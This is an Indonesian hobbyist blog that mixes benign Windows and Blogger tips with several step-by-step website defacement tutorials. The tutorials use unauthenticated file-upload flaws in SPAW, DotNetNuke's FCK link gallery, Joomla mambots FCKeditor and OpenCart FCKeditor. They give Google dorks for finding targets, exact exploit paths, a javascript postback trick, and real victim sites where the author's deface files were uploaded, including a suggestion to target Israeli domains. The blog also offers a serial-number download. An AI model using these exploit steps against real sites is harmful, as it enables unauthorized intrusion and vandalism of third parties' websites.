Twitter Delicious Facebook Digg Stumbleupon Favorites More

Blokir Akses USB dengan device block, maksudnya apa ni....??? mungkin bagi yang belum tau pada bingung ni. dari pada bingung² mending ane jelasin aja y....


kali ini saya akan sharing sedikit tentang tools yang bernama Device Block, tools ini berguna untuk memproteksi Device² yang masuk ke kumputer kita. Contohnya flashdisk. jadi setiap ada device yang masuk harus memasukan password sesuai dengan password yang telah kita setting, klo gk maka flasdisk tersebut gk bakalan bisa di akses. jadi gk sembarang orang bisa masukin flashdisk ke komputer. kita gmana udah ngertikan maksudnya....


software Device Block ini bisa memblokir device2 yang digunakan untuk sambungan perangkat
USB (Flashdisk, memory card, mmc,dsb) untuk lebih jelasnya lihat screenshot berikut.

Blokir Akses USB dengan device block

ntar klo ada perangkat usb yg dcolokin ntar muncul gambar seperti berikut.

Blokir Akses USB dengan device block
kalo anda berminat bisa didownload Software nya disini

untuk serial number bisa didownload disini


silahkan didownload bagi yang berminat........

hahahaha........... asyik gk tu kalo kita Deface web dapet dollar????? kayaknya asyik dech...

ni perhatikan baik baik buat para defacer jangan marah ha.., menurut loe ada gk untungnya loe deface² selama ini...???? gk da kan... apa yang loe hasilkan hanya ngerusak website orang lain... mending kalo kita pelajarin dan dapet ilmu dari kerjaan yang kita lakukan itu, klo gk... kita ngerusak dan ngerusak terus menerus dengan membuat tampilan deface'an kita seindah / semenarik mungkin dengan membubuhi tulisan "hacked by ..." atau apalah itu.

hei bro buka mata & pikiran kalian, mending kalian hasilkan uang dari hobby loe tu... ini buka carding y, klo carding mah ane gak ngerti maklum newbie sejati....
lagian carding sekarang susah bisa² kalian pasan barang yang ngantarnya Interpol/FBI hiii takut, ane masih kuliah belum sarjana....ntar apa kata ortu gue.

ini mo ngomongin Deface web dapet dollar apa mo ngomongin carding......???? oia jadi lupa....

lanjut omz... ni ane baru kepikiran semalam gimana klo ane ambil sedikit keuntungan dari kesenangan gue deface daripada ane deface/ngerusak website orang gk da untungnya... kayaknya belum saatnya dech ane share tuturnya sekarang kayanya nunggu respond dulu dari orang² yang baca ini, lagi pula ane mo buat dulu tutorialnya.......

berikan respond anda dikolom komentar, apakah tutorial ini ane share atau gk?????

wew....sorry ni bro klo nungguin. ane tadi cuma becanda. apalah saya saya hanya seorang Newbie Sejati.....

Ni saya bagi sedikit hadiah....... karna telah mau berkunjung ke blog saya yang jelek ini........
jangan marah ha................ download aja langsung filenya nya


Sekali lagi Sorry.......

Sekedar Documentasi


A = @

U = |_|

B = |3

V = \/

C = (

W = \/\/

D = |)
X = )(
E = 3

Y = '/
F = |=

Z = 2
G = 6

a = 4
H = |-|

b = 8
I = |

c = ©
J = _|

d = |>
K = |(

e = 3
L = |_

f = #
M = /\/\

g = 9
N = /\/

h = h
O = 0

i = |
P = |*

j = j
Q = 0,

k = |<
R = |2

l = 1
S = $

m = m
T = 7

n = n
o = 0

programs = progz
p = |*

god = r00t
q = 0.

fool = f00
r = ®

heart/love = <3
s = 5

what's up = sup
t = +

that = dat
u = 00

look at = peep

v = \/

kill = frag
w = \/\/

sweet = schweet
x = ><

sleep = reboot
y = j

greater than = >
z = 2

newbie = n00b
at = @

no = noes
ck = x0r

woo hoo = w00t
the = teh

why = y
you = j00 or u

be = b
own = pwn

are = r
dude = d00d

fear = ph34r
and = &

super = uber
blah/me = meh

yo = j0
rock = r0xx0r

hacker = h4x0r
cool = k3wl

software = warez
computer = pu73r

chick = chix0r
good = teh win

bad = teh lose
loser = l4m3r

aol = uh, 14m3r
money = monies

bye = bai
kick = punt

porn = pr0n
skill = m4d 5killz

hello = ping
robot = b0t

naked = n3k3d
what = wut

whatever = wutev
cool = c00

to/two = 2
with = wit

sex = cyb3r

Hahahaha........... saya kembali lagi dengan sedikit trik untuk menyembunyikan folder. trik ini berbeda dengan hidden folder. kalau pake hidden folder masih akan kelihatan ketika kita buka Tools>>>Folder Options>>>Views>>>Show hidden files and folders. tapi kali ini gk bisa dilihat dengan cara itu. folder yang kita sembunyikan hanya dapat diketahui dengan cara menyorot atau memblog Direcktory-nya...
oke langsung saja saya mulai.........

Menghapus Nama Folder

  1. buat Folder baru atau pilih Folder yang ingin anda sembunyikan.
  2. klik kanan folder tersebut kemudian pilih rename (ubah nama)
  3. hapus nama atau lansung tekan Alt+255 ◄---- pake NumPad klo gk, gk bakal berhasil
Cara Menyembunyikan Folder

Mengubah icon Folder
  1. klik kanan folder yang tadi pilih Proprties.
  2. pindah ke tab customize
  3. change icon kemudian gulir hingga ketemu icon yang kosong seperti dibawah ini
  4. Cara Menyembunyikan Folder
  5. ok
hasilnya bisa anda lihat seperti gambar berikut
Cara Menyembunyikan Folder
untuk melihat nya anda dapat menyorot / memblok area tersebut.
Tutor ini mungkin bisa berguna untuk menyembunyikan file² anda yang sangat dirahasiakan.

<<<Semoga Bermanfaat>>>

Berikut saya memberikan sebuah tutorial bagaimana anda bisa melihat IP Address dan info detail pengirim email. cuma sekedar sharing pengatahuan, saya gak tau apakah tutorial ini bermanfaat (berguna) bagi anda.


ok langsung saja saya bahas bagaimana Cara Melihat IP Address Pengirim Email



Untuk Gmail / Google Mail.

  1. Login ke account email anda ( http://gmail.com/ ).
  2. Masuk ke inbox
  3. Buka salah satu email yang ingin anda lihat,
  4. Lihat kanan di bagian atas ada pilihan Reply, terus disamping tulisan
    Reply ada tanda panah ke bawah, klik tanda panah tersebut dan pilih Show Original (tampilkan yang asli).
  5. Maka anda bisa mengetahui ip address pengirim email dan info detail yang lain.

Untuk Yahoo Mail.
  1.  Login ke account email ( http://mail.yahoo.com/ ).
  2. Masuk ke inbox dan buka salah satu email yang ingin anda lihat.
  3. Pada pojok kanan bawah cari menu tulisan “Full Headers” dan klik tulisan tersebut.
  4. Maka anda bisa mengetahui ip address pengirim email dan info detail
    yang lain.


Untuk Hotmail.

  1. Login ke account email anda ( http://hotmail.com/ ). 
  2. Buka salah satu email yang ingin anda lihat
  3. Klik kanan email tersebut dan pilih View Source.
  4. Maka anda bisa mengetahui ip address pengirim email dan info detail
    yang lain.

Untuk Outlook Express.


  1. Buka program Outlook Express dan login ke email anda. 
  2. Klik kanan pada salah satu email yang ingin anda lihat.
  3. Klik menu Properties.
  4. Klik tab Detail.
  5. Maka anda bisa mengetahui ip address pengirim email dan info detail
    yang lain.

Untuk Microsoft Outlook.


  1.  Buka program Outlook Express dan login ke email anda. 
  2. Klik kanan pada salah satu email yang ingin anda lihat dan pilih Options 
  3. Maka anda bisa mengetahui ip address pengirim email dan info detail
    yang lain.
Sekian tutorial  Cara Melihat IP Address Pengirim Email dari saya

<<<Semoga Bermanfaat>>>

Ok kembali lagi bersama 70H4N 7M di Newbie Sejati, untuk membahas tutorial Spaw Upload Vulnerably / Spaw Editor Remote File Upload / Spaw File Manager. 


tanpa basa-basi lagi langsung kita tancap gas, gak usah pake rem lagi......

Tutorial Spaw Upload Vulnerably

dork [ spaw2/dialogs/ ] dan 
     [ spaw2/uploads/files/ ]

pertama-tama langsung kita cari target dengan memasukkan salah satu dork diatas di mesin pencari (google)

klo udah dapat target misalkan http://www.simoncarves.com/admin/spaw2/uploads/files/SC.pdf 

ganti spaw2/uploads/files/SC.pdf dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files maka akan muncul tampilan halaman/ form buat upload File.
ganti lokasi penyimpanan / directory jadi files seperti gambar dibawah ini.


kalo sudah Upload Dech File kamu.........

Apabila Proses ulpoad udah selesai maka akan terlihat file kamu. untuk mengetahui lokasi file kamu klik file yang baru kamu uploadtrus lihat disebelah kanan. ada link download file. seperti gambar berikut






klik link tersebut. maka akan terlihat file hasil deface'an kamu. contoh http://www.simoncarves.com/admin/spaw2/uploads/files/ns.txt

selesai dech tuturial Spaw Upload Vulnerably........
sampai ketemu di postingan berikutnya......
<<<Semiga bermanfaat>>>

Deface ala DotNetNuke. Sebelum kita mulai tutorial Deface ala DotNetNuke ini, mungkin di antara anda ada yang ber-tanya²  apa itu DotNetNuke...??? bagi yang belum tahu silahkan baca Disini. udah taukan??? nah klo udah tau mari kita langsung operasi.

sebenarnya bugs ini termasuk bugs lama, tapi masih banyak yang guna'in web aplikasi ini.............
postingan ini buka yang pertama kali ane post. pertama kali ane post di Forum MEH kemudian digroup Facebook Blackbox Guardian Yang berganti Nama Jadi Red Alpha. Terus Di forum BCC nah yang ane disini kali keempat-nya. itung-itung  buat nambah² archive Blog..hehehehehe

langsung saja

1. Sapkan file deface anda
contoh bisa di lihat di sini >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt
lalu save di notepad dengan nama file terserah anda contoh 70h4n-7m.txt

2.mencari target web

dork >> inurl:”/portals/0″
search di google...!!

3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt << Target sekarang ganti "portals/0/70h4n-7m.txt" dengan >> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

hingga seperti ini >> http://www.familyabusecenter.org/Pro...nkgallery.aspx
Enter..!!

lalu klik/ceklist Link Type: >> File ( A File On Your Site )

setelah di klik atto ceklis,hapus link di URL...!!
http://www.familyabusecenter.org/Pro...nkgallery.aspx
/\
||
||
hapus semua..!!
lalu masukan ini di URL >> javascript:__doPostBack('ctlURL$cmdUpload','')
>>>ENTER..!!

lalu silahkan Upload dari kompi/PC anda file yg td di save contoh 70H4N-7M.txt
klik >> Upload Selected File

Catatan: Anda hanya dapat meng-upload type file:*. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob
tetapi admin dapat mengubah ini

selesai upload nanti kelihatan di File Name contoh: 70H4N-7M.txt
untuk melihat hasilnya >> nama web/Portals/0/nama file

contoh >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt

Selesai dech........
dari tutor diatas silahkan di explore kemampuan anda

Selamat mencoba



<<<Semoga Bermanfaat>>>

Disable data execution prevention


pakah anda pernah melihat pesan seperti gambar disamping? jika ya berarti anda mengalami hal yang sama seperti yang saya alami beberapa waktu lalu, kejadiannya dikantor setelah selesai install ulang komputer kantor. pesan itu memang sangat menyebalkan karena kita tidak bisa membuka windows explorer. karena dah pusing akhirnya jalan satu2nya searching di google dan akhirnya dapat juga cara untuk disable DEP. Mau tahu caranya ?


Caranya sangat simpel :
1. Klik Start Menu
2. Pilih Control Panel
3. Pilih System Kemudian pilih tab Advanced
4. Kemuadian di Performance kita pilih Settings
5. Pada tab Data Execute pilih Turn on DEP for all programs and services except for those I select
6. Klik Add lalu pilih aplikasi yang akan kita non aktifkan DEP nya
7. Lalu pilih Open - Apply
8. Restart

Kalau cara diatas tidak berhasil, kita bisa disable DEP secara Global caranya masuk ke Control Panel pilih System - Advanced - Startup and Recovery - Settings lalu pilih Edit. pada boot.ini tambahkan atau edit /execute menjadi /noexecute=Alwaysoff

Selesai


<<< Semoga Bermanfaat>>>

Joomla mambots File Upload Vulnerability, hehehehe..... sorry y kalo judulnya agak aneh soalnya ane buat sendiri tu judul, habisnya gk tau apa nama teknik/ tutorial yang bakal ane jelasin ini.

Gk pake basa-basi lagi malas ane ngetik-nya lagi. lansung kita ke topik pembahasan....

  1. cari digoogle dengan dork inurl:index.php?option=com_content contoh ane dapet http://www.thomaskoetzing.de/index.php?option=com_content&task=view&id=57&Itemid=97
  2. kemudian hapus index.php?option=com_content&task=view&id=57&Itemid=97 ganti dengan mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?T
    ype=File&Connector=connectors/php/connector.php
    maka jadiny http://www.thomaskoetzing.de/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  akan muncul halaman/ form untuk upload file maukkan file deface anda. ingat type file yang bisa di upload berbeda-beda. nah disini ane cuma buat coba² jadi ane masukin file txt.
  3. apabila selesai mengupload file maka file kita akan muncul di form/halam itu....
  4. untuk melihat dimana lokasi file kita dilettakan. blok dan klik kanan file yang barusan kita upload kemudian pilih View Selection Source, akan muncul seperti berikut
Joomla mambots File Upload Vulnerability

    Kurang lebih seperti itu tampilannya. kita lihat filenya ada di directory /File/ jadi letaknya ada di http://www.thomaskoetzing.de/File/70h4n.txt

Selesai dech tutorial Deface dengan Joomla mambots File Upload Vulnerability


<<< Semoga Bermanfaat>>>

Membuat Sendiri Recent post Animasi

Banyak versi widget recent post yang bisa anda gunakan untuk blog anda, mulai dari widget yang disediakan blogger sampai widget dari pihak ketiga. 

Dan kali ini saya akan mengetengahkan cara menambahkan sebuah versi baru dari sekian jumlah widget recent post blogger yang ada. Widget recent post berikut selain memiliki effect animasi spy karena penggunaan script JQuery juga dilengkapi dengan thumbnail dan captions. Sebuah karya kecil hasil pengembangan dari blogger Indonesia (Abu Farhan).

Nah seperti apa widget Yang bakal saya jelaskan  silahkan lihat live demo diatas, jika anda tertarik tuk mencobanya, silahkan ikuti tutorial selanjutnya.
  1.  Login Diblogger Seperti Biasa.
  2. Pada halaman DASBOR Pilih rancangan
  3. Kemudian tambahkan gadget
  4. pilih HTML/JavaScript
  5. isikan kolom judul terserah anda.....
  6. kemudian copy paste kode berikut di kolom konten
  7. <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
    <style media="screen" type="text/css">
    <!--
    #spylist {overflow:hidden;margin-top:5px;padding:0px 0px;height:350px;}
    #spylist ul{width:220px;overflow:hidden;list-style-type: none;padding: 0px 0px;margin:0px 0px;}
    #spylist li {width:208px;padding: 5px 5px;margin:0px 0px 5px 0px;list-style-type:none;float:none;height:70px;
    overflow: hidden;background:#000;border:1px solid #ddd;}
    #spylist li a {text-decoration:none;color:#4B545B;font-size:11px;height:18px;overflow:hidden;padding:0px 0px 2px 0px;}
    #spylist li img {float:left;margin-right:5px;background:#EFEFEF;border:0;}
    .spydate{overflow:hidden;font-size:10px;color:#0284C2;padding:2px 0px;margin:1px 0px;height:15px;
    font-family:Tahoma,Arial,verdana, sans-serif;}
    .spycomment{overflow:hidden;font-family:Tahoma,Arial,verdana, sans-serif;font-size:10px;color:#262B2F;}
    -->
    </style>
    <script language="JavaScript">
    imgr = new Array();
    imgr[0] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgULQUwzoiDe9rJeZ1wE09lTTR7mW4BJDPHXeHkgsFgZctwR6BWGYBWuTYndLi6AAmpUC4nM0emwa9dbAD0vXOiFgCe9iDehTcwXZ-CTA13Zjr8DrUsPYsUOFzswBFi-rvkqvgOknEaB__V/s220/cyber.png";
    imgr[1] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgULQUwzoiDe9rJeZ1wE09lTTR7mW4BJDPHXeHkgsFgZctwR6BWGYBWuTYndLi6AAmpUC4nM0emwa9dbAD0vXOiFgCe9iDehTcwXZ-CTA13Zjr8DrUsPYsUOFzswBFi-rvkqvgOknEaB__V/s220/cyber.png";
    imgr[2] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgULQUwzoiDe9rJeZ1wE09lTTR7mW4BJDPHXeHkgsFgZctwR6BWGYBWuTYndLi6AAmpUC4nM0emwa9dbAD0vXOiFgCe9iDehTcwXZ-CTA13Zjr8DrUsPYsUOFzswBFi-rvkqvgOknEaB__V/s220/cyber.png";
    imgr[3] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgULQUwzoiDe9rJeZ1wE09lTTR7mW4BJDPHXeHkgsFgZctwR6BWGYBWuTYndLi6AAmpUC4nM0emwa9dbAD0vXOiFgCe9iDehTcwXZ-CTA13Zjr8DrUsPYsUOFzswBFi-rvkqvgOknEaB__V/s220/cyber.png";
    imgr[4] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgULQUwzoiDe9rJeZ1wE09lTTR7mW4BJDPHXeHkgsFgZctwR6BWGYBWuTYndLi6AAmpUC4nM0emwa9dbAD0vXOiFgCe9iDehTcwXZ-CTA13Zjr8DrUsPYsUOFzswBFi-rvkqvgOknEaB__V/s220/cyber.png";
    showRandomImg = true;
    boxwidth = 255;
    cellspacing = 6;
    borderColor = "#232c35";
    bgTD = "#000000";
    thumbwidth = 70;
    thumbheight = 70;
    fntsize = 12;
    acolor = "#666";
    aBold = true;
    icon = " ";
    text = "comments";
    showPostDate = true;
    summaryPost = 40;
    summaryFontsize = 10;
    summaryColor = "#666";
    icon2 = " ";
    numposts = 10;
    home_page = "http://www.satriacell.com/";
    limitspy=4
    intervalspy=4000
    </script>
    <div id="spylist">
    <script type='text/javascript'>
    jQuery(function(){jQuery("ul.spy").simpleSpy(limitspy,intervalspy).bind("mouseenter",function(){jQuery(this).trigger("stop")}).bind("mouseleave",function(){jQuery(this).trigger("start")})});(function(e){e.fn.simpleSpy=function(f,g){f=f||4;g=g||5000;return this.each(function(){var l=e(this),k=true,i=[],m=f,o=0,h=l.find("> li:first").height();l.find("> li").each(function(){i.push("<li>"+e(this).html()+"</li>")});o=i.length;l.wrap('<div class="spyWrapper" />').parent().css({height:h*f});l.find("> li").filter(":gt("+(f-1)+")").remove();l.bind("stop",function(){k=false}).bind("start",function(){k=true});function n(){if(k){var p=e(i[m]).css({height:0,opacity:0,display:"none"}).prependTo(l);l.find("> li:last").animate({opacity:0},1000,function(){p.animate({height:h},1000).animate({opacity:1},1000);e(this).remove()});m++;if(m>=o){m=0}}setTimeout(n,g)}n()})}})(jQuery);function showrecentposts(z){document.write('<ul class="spy">');j=(showRandomImg)?Math.floor((imgr.length+1)*Math.random()):0;img=new Array();for(var o=0;o<numposts;o++){var w=z.feed.entry[o];var g=w.title.$t;var f;var p;if(o==z.feed.entry.length){break}for(var l=0;l<w.link.length;l++){if(w.link[l].rel=="alternate"){p=w.link[l].href;break}}for(var l=0;l<w.link.length;l++){if(w.link[l].rel=="replies"&&w.link[l].type=="text/html"){f=w.link[l].title.split(" ")[0];break}}if("content" in w){var r=w.content.$t}else{if("summary" in w){var r=w.summary.$t}else{var r=""}}postdate=w.published.$t;if(j>imgr.length-1){j=0}img[o]=imgr[j];s=r;a=s.indexOf("<img");b=s.indexOf('src="',a);c=s.indexOf('"',b+5);d=s.substr(b+5,c-b-5);if((a!=-1)&&(b!=-1)&&(c!=-1)&&(d!="")){img[o]=d}cmtext=(text!="no")?'<i><font color="'+acolor+'">('+f+" "+text+")</font></i>":"";var q=[1,2,3,4,5,6,7,8,9,10,11,12];var x=["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"];var u=postdate.split("-")[2].substring(0,2);var h=postdate.split("-")[1];var t=postdate.split("-")[0];for(var e=0;e<q.length;e++){if(parseInt(h)==q[e]){h=x[e];break}}var n=(showPostDate)?'<i><font color="'+acolor+'"> ('+u+" "+h+" "+t+")</font></i>":"";g=(aBold)?"<b>"+g+"</b>":g;var v='<li><a href="'+p+'"><img src="'+img[o]+'" width="'+thumbwidth+'" height="'+thumbheight+'" class="recent-thumb"/></a><a href="'+p+'" class="recent-link">'+g+'</a><div class="spydate">'+n+'</div><div class="spycomment">'+cmtext+"</div>";document.write(v);j++}document.write("</ul>")}document.write('<script src="'+home_page+"feeds/posts/default?max-results="+numposts+'&orderby=published&alt=json-in-script&callback=showrecentposts"><\/script>');
    </script>
    </div>
  8. Save Dan lihat hasilnya....
<<<Semoga Bermanfaat>>>

Cara melindungi pc dari situs porno

Cara melindungi pc dari situs porno | Tak dapat dpungkiri conten conten yang berbau porno sangat cepat sekali perdarannya, ditambah dukungan teknologi yang disalah gunakan, salah satunya melalui internet atau dunia maya, Jika dibiarkan saja merebak ke permukaan maka akan merusak moral generasi muda anak bangsa.

Bagi anda yang kebingungan untuk memblokir situs yang berbau conten-conten porno, berikut ini caranya. Dan cara ini sangat gampang dan gratis. Pada postingan sebelum-nya juga Sudah pernah saya bahas Cara memblokir situs porno dari komputer. Dimana pada tutorial itu kita memblokir (mendisable) Situs-situs yang berbau konten porno berdasarkan ip dan alamat situsnya. nah klo disini kita menggunakan batuan pihak ketiga yakni Nawala Project. apa itu Nawala Project????

Nawala Project adalah sebuah layanan yang bebas digunakan oleh pengguna internet yang membutuhkan saringan konten negatif. Nawala Project secara spesifik akan memblokir jenis konten negatif yang tidak sesuai dengan peraturan perundangan, nilai dan norma sosial, adat istiadat dan kesusilaan bangsa Indonesia seperti pornografi dan perjudian. Selain itu, Nawala Project juga akan memblokir situs Internet yang mengandung konten berbahaya seperti malware, situs phising (penyesatan) dan sejenisnya.

Perlindungan pengguna, terutama anak-anak menjadi perhatian utama Nawala Project. Dengan adanya layanan ini diharapkan Internet dapat menjadi tempat yang lebih aman dan nyaman agar dapat dimanfaatkan secara optimal oleh masyarakat Indonesia untuk mempercepat kemajuan serta kesejahteraan.


Layanan ini sejak awal dirancang untuk menerima masukan langsung dari komunitas internet dan Masyarakat Umum yang menjadi pengguna layanan. Masukan inilah yang ditelaah oleh Tim Nawala Project untuk menentukan apakah sebuah situs layak di filter atau tidak.


Ok langsung aja ya kita jelaskan tutorial Cara melindungi pc/Komputer dari situs porno.......
  1. Masuk Control Panel dan Pilih Network Connection
  2. Klik kanan pada Local Area Connection pilih Propertis
  3. Double klik "Internet Protocol (TCP/IP)"
  4. Cara melindungi pc dari situs porno
    DNS nawala Preferred DNS Service :180.131.144.144 AlternatebDNS Service :180.131.145.145
  5. Isikan DNS nawala pada kolom DNS seperti terlihat gambar di atas, setelah selesai klik Ok
<<<Semogga Bermanfaat>>>

    Deface ala Opencart atau Opencart remote file Upload Vulnerability merupakan salah satu cara buat deface sebuah web yang support opencart, sebenarnya bugs ini termasuk bugs lama, namun berhubung banyaknya pertanyaan-pertanyaan yang masuk ke-saya melalui jejaring sosial sebut saja facebook. "Omz johan gimana sich deface menggunakan opencart...???" kurang lebih seperti itu pertanyaan yang masuk kesaya. ada juga yang lansung ngomong melalui chatroom "Om johan omz ajarin aku opencart donk" padahal duluan dia dibanding saya kenal dunia deface Sebut saja "DYAZ M.R" Sorry y omz Dyaz namanya ane masukin dipostingan ni...hehehehe.

    Berhubung saya gk bisa merangkai kata² lg mending kita langsung aja y.................
    Pertama-tama masukkan dork "Powered By OpenCart" di google anda bisa menambah Nama domain negara tujuan misalnya "Powered By OpenCart" site:il untuk negara Israel.
    misalkan kita dapatkan http://emanuel-tehila.co.il/index.php?route=product/category&path=66_30_35. nah sepertinya OpenCart-nya ada di halaman awal. hapus index.php?route=product/category&path=66_30_35 ganti dengan admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

    maka akan muncul halan untuk mengupload File kurang lebih seperti gambar dibawah ini tampilannya.

    Deface ala OpenCart/Opencart remote file Upload Vulnerability


    Disini kita gk bisa lansung upload File deface kita, kita musti ubah dulu connectornya jadi PHP dulu.

    Deface ala OpenCart/Opencart remote file Upload Vulnerability



    Sampai disini baru dah kita upluad file Deface-an kia contoh "703.html", apabila muncul pesan "File uploaded with no errors" berarti kita sukses mengupload file tadi. untuk hasilnya bisa ada di www.nama site.com/nama file.html contohnya http://emanuel-tehila.co.il/703.html

    Selesai dech proses deface ala OpenCart. mohon koreksinya jika ada kekeliruan,


    <<<Semoga Bermanfaat>>>

                 Pada dasarnya semua ISP (Internet Service Provider) atau penyedia layanan sambungan internet seperti indosat, Telkomsel, Telkom, dan sebagainya menggunakan atau mempunyai DNS Server tersendiri.Server DNS suatu ISP atau penyedia internet tentunya juga mempunyai kemampuan, kecepatan, speseifikasi, dan lama cache tersediri.

                 Adakalanya Server DNS ini Drop karena padatnya Trafik DNS server suatu ISP. Sehingga menyebabkan lambannya query atau proses request. Jadi bila terjadi gangguan pada Server DNS suatu ISP, maka pada saat kita akan membuka website menggunakan browser seperti mozila , Firefox, Opera, Flock, safari dan sebagainya, maka akan terasa lebih lambat bahkan terjadi konfirmasi error atau not Found pada browser kita. Seperti yang dulu sering terjadi di Telkom Speedy beberapa saat lalu.

                 Meski ISP atau penyedia Internet yang kita gunakan mempunyai Server DNS sendiri sebenarnya kita juga bisa menggunakan atau memanfaatkan DNS server ISP operator lain. Jadi Server DNS ini bisa kita gunakan untuk semua jenis ISP yang kita gunakan.

    Beberapa DNS Server Indonesia :
    • 202.134.0.62
    • 202.134.0.155
    • 202.134.1.10
    • 203.130.196.5
    • 202.134.2.5
    • 202.155.0.10
    • 202.155.0.15
    • 202.155.0.20
    • 202.155.0.25
    • 202.155.46.66
    • 202.155.46.77
    • 202.155.30.227
    • 202.159.32.2
    • 202.159.33.2
    • 202.155.30.227
    Berikut ini langkah atau Cara merubah Setting DNS pada windows :
    1. Control panel 
    2. Network Connections 
    3. Klik kanan account sambungan internet yang sedang aktif /connected 
    4. Properties
    5. Networking 
    6. Internet Protocol
    7. Properties 
    8. Beri Tanda pada Use the Following DNS server addresses 
    9. Masukan DNS yang anda pilih klo ane pake 202.134.0.155 dan 61.94.192.12
    10. Klik Ok
    Restart Ulang Koneksi Internet anda , Perubahan akan terjadi setelah anda restart ulang koneksi internet anda.
    Silahkan pilih alternatif DNS Server berikut ini, gunakan DNS yang anda rasa paling cepat pada sambungan internet anda.
     
    <<< Semoga Bermanfaat>>>

    Melindungi komputer dari virus

                   Untuk mencegah virus, trojan, worm dan sejenisnya dengan memakai antivirus?, belum tentu berguna. Karena virus selalu lebih baru dari antivirus, kalau proteksi dengan program firewall & Antivirus RTS? (Real Time System), bisa juga... cumannya komputer anda akan berjalan lebih lambat, karena program tersebut residen di memory dan memakan system resource lagi pula setiap anda membuka program baru, selalu akan muncul pertanyaan apakah program ini boleh dijalankan. 

                   Jadi solusi yang aman, cepat dan praktis bagaimana? Nah baca lebih lanjut artikel ini. Artikel ini sengaja ditulis bagi anda yang ingin mencegah kerusakan system, file dan data anda tanpa perlu campur tangan antivirus dan firewall alias MANUAL.

    Pertama-tama akan kami jelaskan definisi dan bagaimana virus, trojan, worm dan sejenisnya bisa masuk ke dalam sistem komputer anda. 

                 Virus sebenarnya lain dengan trojan atau worm, tapi pada prakteknya penyebarannya virus banyak di maanfaatkan oleh program worm dan trojan. Trojan adalah sebuah program yang dapat dijalankan (biasanya ber-ekstension EXE) oleh pengguna komputer dan ketika program tersebut dijalankan, dia akan merubah sesuatu dari sistem komputer kita (pada umumnya registri windows yang diubah). Nah kalau virus itu residen di memori dan dia akan merubah file yang biasanya ber-ekstension EXE atau COM dan kadang-kadang file tersebut menjadi rusak. Kalau worm (cacing) merupakan program kecil yang berupa script yang bisa nempel di mana aja, bahkan bisa nempel di html file (file website). 

                 Program antivirus pada umumnya menggabungkan semua worm dan trojan dalam kategori VIRUS, cuma mungkin dikasih kode virusnya contoh yang worm di kasih kode W depannya baru nama worm tersebut (contoh: w32/sober) dan kita juga akan menggangapnya sama karena semua itu merusak sistem file komputer. Intinya virus bisa berupa atau berfungsi seperti trojan/worm dan sebaliknya juga, apalagi kalau file tersebut telah ter-infeksi, otomatis akan menjadi file trojan/worm juga, karena kalau pengguna membukanya akan meng-infeksi file-file lainnya. 

                  Penyebaran virus dulunya hanya bisa melalui media luar seperti disktet, tapi di jaman ini virus pada umumnya memanfaatkan teknologi internet untuk menyebar luas. Cara masuknya bisa melalui E-mail (attachment), mirc, messenger (kirim/download file), download dr situs (terutama situs porno) atau bahkan memanfaatkan kelemahan dari sistem browser kita. Banyak cara pembuat virus untuk menjebak orang supaya tertarik untuk men-download dan membuka file yang ber-virus, antara lain dengan iming-iming gambar porno, gambar lucu, tools yang berguna buat anda, cara dapat uang, games bagus, hingga yang baru-baru ada pesan dr FBI/CIA untuk anda. 

    Sebenarnya cara mengatasi virus itu cukup mudah, antara lain:
    1. Jangan membuka atau menerima file yang di dapat dr email, mirc dan messenger kalau anda belum kenal dengan pengirimnya dan belum yakin file itu berisi virus.
    2. Kalau anda browser ke situs yang tidak anda kenal, matikan program java & java script. Matikan juga fitur install auto atau install on demand supaya program yang berisi virus tidak akan masuk secara otomatis ke komputer anda.
    3. Kalau membuka disket, CD, DVD, USB drive dan media luar apapun bentuknya, scan dahulu dengan program antivirus untuk memastikan itu benar-benar aman.

                  Tips di atas mungkin akan mencegah masuknya virus ke komputer anda, tapi tidak akan 100% pasti komputer anda tidak terkena virus, bisa saja anda kecolongan. Lebih dari 90% komputer yang terkoneksi di Internet pernah terkena virus. Nah untuk mengatasi supaya anda aman dari virus, walaupun virus tersebut sempat masuk ke komputer anda, berikut ini adalah caranya:

                  Virus pada umumnya akan merusak dan memperlambat proses kerja komputer. Untuk menghindari kerusakan yang ditimbulkan virus, anda harus punya cadangan penyimpanan data atau file system. Untuk itulah backup system & data sangat diperlukan, apalagi kita tidak akan mengetahui virus di masa yang akan datang akan secanggih apa dan efek kerusakan yang ditimbulkan sejauh apa. cara backup pada winXp dan winme dengan create restore point dahulu di program> accesories> system tools> system restore, win98 bisa pakai Microsoft Backup dengan membackup folder windows semuanya. Khusus untuk data, Winxp dan winme juga harus menggunakan Microsoft Backup, karena system restore tidak 100% mengembalikan data anda.

                  Kalau anda males melakukannya secara manual, winxp dan winme sudah otomatis melakukannya setiap anda mematikan komputer anda, Untuk win98 satu-satunya cara hanya memakai program system schedule windows atau program lainnya yang berfungsi sebagai otomatis backup, ketika komputer lagi idle. tapi untuk pastinya, winxp dan winme juga harus memakai program tersebut supaya bila terjadi apa-apa, anda tinggal me-restore kembali. Bila komputer anda hari ini terkena virus, anda tinggal restore system sebelumnya atau yang kemarin.

